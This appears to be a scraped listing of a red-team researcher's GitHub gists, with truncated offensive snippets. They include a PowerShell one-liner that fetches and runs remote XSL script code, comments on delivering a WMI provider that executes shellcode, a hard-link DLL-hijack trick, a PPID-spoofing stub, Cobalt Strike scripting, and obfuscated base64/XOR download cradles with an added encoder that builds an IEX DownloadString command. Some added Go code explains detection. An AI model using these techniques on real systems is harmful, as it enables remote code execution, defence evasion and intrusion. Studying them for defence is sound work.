Mariusz B. mgeeky
Offensive Sencha Consultant
mgeeky / shellcodeLoader.go
Created May 13, 2020
Simple Shellcode loader implemented in Golang
View shellcodeLoader.go
//
// Simple Shellcode loader implemented in Golang.
//
// Compilation:
// $ go build -o foo.exe shellcodeLoader.go
//
// Mariusz B. / mgeeky (@mariuszbit), '20
// <mb@binary-offensive.com>
//
@mgeeky
mgeeky / Update_Notes.md
Created Apr 30, 2020
You have found THE coolest gist :) Come to DerbyCon to learn more. Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property
View Update_Notes.md

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

The link is simply a second directory entry for the attacker's file, so the loader's search resolves to attacker-controlled content while no write ever lands under System32\Tasks; tools that only watch for file modifications in that directory see nothing. Caveat: NTFS hard links cannot span volumes, so the controlled file must sit on the same drive as the Tasks directory.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html
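The tell-tale sign of this trick is that the file under the watched directory has a link count above one and shares its inode (file ID on NTFS) with a file elsewhere. The following added example, not part of the gist, rebuilds the scenario in a temporary directory on a Unix host as a stand-in for System32\Tasks and C:\Tools, creates the link with os.Link (the equivalent of `mklink /h`), and shows the two checks a defender can run. The directory names, the stand-in file content and the Unix-only link count via syscall.Stat_t are assumptions; on Windows, `fsutil hardlink list <path>` yields the same information.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"syscall"
)

// HardLinkCount returns how many directory entries refer to the file's inode.
// A count above 1 means the file in the watched directory has another name
// somewhere on the same volume, which is exactly what the mklink /h trick
// relies on. Uses the Unix stat structure (assumption: not portable to Windows).
func HardLinkCount(path string) (uint64, error) {
	fi, err := os.Stat(path)
	if err != nil {
		return 0, err
	}
	st, ok := fi.Sys().(*syscall.Stat_t)
	if !ok {
		return 0, errors.New("link count not available on this platform")
	}
	return uint64(st.Nlink), nil
}

// IsAlias reports whether two paths name the same underlying file. This is
// what separates a hard link from a copy: os.SameFile compares device+inode.
func IsAlias(a, b string) (bool, error) {
	fa, err := os.Stat(a)
	if err != nil {
		return false, err
	}
	fb, err := os.Stat(b)
	if err != nil {
		return false, err
	}
	return os.SameFile(fa, fb), nil
}

// Demo builds the scenario: a "watched" directory (stand-in for System32\Tasks),
// an attacker-controlled file elsewhere (stand-in for C:\Tools\Tasks.dll) and a
// hard link from the watched directory back to it. It returns the link count
// seen from the watched side and whether both names resolve to one file.
func Demo() (uint64, bool, error) {
	root, err := os.MkdirTemp("", "hardlink-demo")
	if err != nil {
		return 0, false, err
	}
	defer os.RemoveAll(root)

	watched := filepath.Join(root, "Tasks")
	tools := filepath.Join(root, "Tools")
	for _, d := range []string{watched, tools} {
		if err := os.Mkdir(d, 0o755); err != nil {
			return 0, false, err
		}
	}
	target := filepath.Join(tools, "Tasks.dll")
	// Constructed stand-in content; a real case would be the attacker's DLL.
	if err := os.WriteFile(target, []byte("attacker-controlled bytes"), 0o644); err != nil {
		return 0, false, err
	}
	link := filepath.Join(watched, "tasks.dll")
	// Equivalent of: mklink /h <watched>\tasks.dll <tools>\Tasks.dll
	if err := os.Link(target, link); err != nil {
		return 0, false, err
	}

	n, err := HardLinkCount(link)
	if err != nil {
		return 0, false, err
	}
	same, err := IsAlias(link, target)
	if err != nil {
		return 0, false, err
	}
	return n, same, nil
}

func main() {
	n, same, err := Demo()
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Printf("link count seen in watched dir: %d, same file as attacker path: %v\n", n, same)
}
```

A monitoring rule that baselines link counts for DLL-like files under sensitive directories (count > 1 is abnormal for system binaries) catches this without needing to see a write event.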

@mgeeky
mgeeky / PowerShell.txt
Created Apr 30, 2020
Snippets of PowerShell bypass/evasion/execution techniques that are interesting
View PowerShell.txt
##############################################################################
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### [https://twitter.com/bohops/status/966172175555284992]
$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;
##############################################################################
### Powershell VBScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965670898379476993]
View EvilWMIProvider.cs
// Based On LocalAdmin WMI Provider by Roger Zander
// http://myitforum.com/cs2/blogs/rzander/archive/2008/08/12/how-to-create-a-wmiprovider-with-c.aspx
// Adapted For Evil By @subTee
// Executes x64 ShellCode
//
// Deliver and Install dll
// C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /i EvilWMIProvider.dll
// Invoke calc for SYSTEM level calculations
// Invoke-WmiMethod -Class Win32_Evil -Name ExecShellCalcCode
// Invoke-WmiMethod -Namespace root\cimv2 -Class Win32_Evil -Name ExecShellCode -ArgumentList @(0x90,0x90,0x90), $null
View PPID Spoof & BlockDLLs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace BlockDllTest
{
    class Program
    {
        static void Main(string[] args)
        {
@mgeeky
mgeeky / httprequest.cna
Last active Apr 7, 2020
Safe & sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script. Works with HTTP & HTTPS, GET/POST/etc. + redirections.
View httprequest.cna
#
# Safe & sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script.
# Works with HTTP & HTTPS, GET/POST/etc. + redirections.
#
# Mariusz B. / mgeeky
#
import java.net.URLEncoder;
import java.io.BufferedReader;
import java.io.DataOutputStream;
@mgeeky
mgeeky / Download-Cradles-Oneliners.md
Last active May 6, 2020
Various PowerShell download cradles written as one-liners
View Download-Cradles-Oneliners.md

Download Cradles

0) Extra goodies

  • Obfuscated FromBase64String combined with -bxor, handy for deobfuscating strings at runtime:
$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''
  • The same as above but for UTF-16 base64 encoded strings:
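The one-liner above resolves [Convert]::FromBase64String by wildcard ('F*g'), decodes the blob, XORs every byte with 35 and casts the result to chars. This added example, not from the gist, implements both directions so the blobs can be generated as well as read back; the UTF-16 pair is an assumption about the truncated "UTF-16" variant (XOR applied to the UTF-16LE byte stream, the encoding PowerShell's -EncodedCommand expects). The sample blob is the one from the gist; the other inputs are constructed.

```go
package main

import (
	"encoding/base64"
	"errors"
	"fmt"
	"unicode/utf16"
)

// XorKey is the key hard-coded in the one-liner (-bxor 35).
const XorKey byte = 35

// Decode reverses the cradle: base64 -> bytes -> XOR key -> chars.
// Each byte becomes one char exactly as [char]$_ does, so 0x80-0xFF
// map to the matching Latin-1 code points.
func Decode(b64 string, key byte) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	out := make([]rune, len(raw))
	for i, b := range raw {
		out[i] = rune(b ^ key)
	}
	return string(out), nil
}

// Encode produces a blob the one-liner will decode: XOR, then base64.
func Encode(s string, key byte) string {
	raw := []byte(s)
	for i := range raw {
		raw[i] ^= key
	}
	return base64.StdEncoding.EncodeToString(raw)
}

// EncodeUTF16 is the assumed UTF-16LE variant. Note that the XOR hits the
// high bytes too; for ASCII text those are zero, so the key itself shows
// up in every second byte of the blob, a pattern easy to spot in detection.
func EncodeUTF16(s string, key byte) string {
	units := utf16.Encode([]rune(s))
	raw := make([]byte, 0, 2*len(units))
	for _, u := range units {
		raw = append(raw, byte(u)^key, byte(u>>8)^key)
	}
	return base64.StdEncoding.EncodeToString(raw)
}

// DecodeUTF16 reverses EncodeUTF16 and rejects blobs that cannot be UTF-16.
func DecodeUTF16(b64 string, key byte) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(raw)%2 != 0 {
		return "", errors.New("odd byte count, not a UTF-16 string")
	}
	units := make([]uint16, len(raw)/2)
	for i := range units {
		lo := raw[2*i] ^ key
		hi := raw[2*i+1] ^ key
		units[i] = uint16(lo) | uint16(hi)<<8
	}
	return string(utf16.Decode(units)), nil
}

func main() {
	s, err := Decode("Yk9CA05CA0hMV0I=", XorKey)
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Printf("sample blob from the gist decodes to %q\n", s)
	// Constructed plaintext; example.invalid is a reserved, non-resolving name.
	fmt.Println(Encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')", XorKey))
}
```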
@mgeeky
mgeeky / certbot-wildcard-request.sh
Last active Apr 15, 2020
Let's Encrypt certbot command for a wildcard certificate request, which requires validation through the DNS-01 challenge
View certbot-wildcard-request.sh
#!/bin/bash
if [ $# -ne 1 ]; then
    echo "Usage: ./certbot-wildcard-request.sh <domain-name>"
    exit 1
fi
DOMAIN="$1"
certbot certonly \
@mgeeky
mgeeky / apache-common.local
Created Apr 5, 2020
Some example fail2ban configuration
View apache-common.local
#
# This supersedes the old and incorrect datepattern regex for older Apache2 instances to make
# it work against Apache 2.4+ ones.
#
# Mariusz B. / mgeeky
#
[DEFAULT]
datepattern = \[(%%d/%%b/%%Y:%%H:%%M:%%S %%z)\]
@mgeeky
mgeeky / red-teaming-bloodhound-cypher-queries.md
Last active Mar 10, 2020
A handy list of Cypher queries that I've used during AD assessments
View red-teaming-bloodhound-cypher-queries.md
  • Returns computer names and their operating system for statistics purposes
MATCH (c:Computer) WHERE c.operatingsystem is not null RETURN c.name as Name, c.operatingsystem as OS
  • Returns a summary report of machines grouped by their operating systems versions, along with number of machines running specific OS version:
MATCH (c:Computer) WHERE c.operatingsystem IS NOT NULL RETURN c.operatingsystem AS OS, count(c) AS Number ORDER BY Number DESC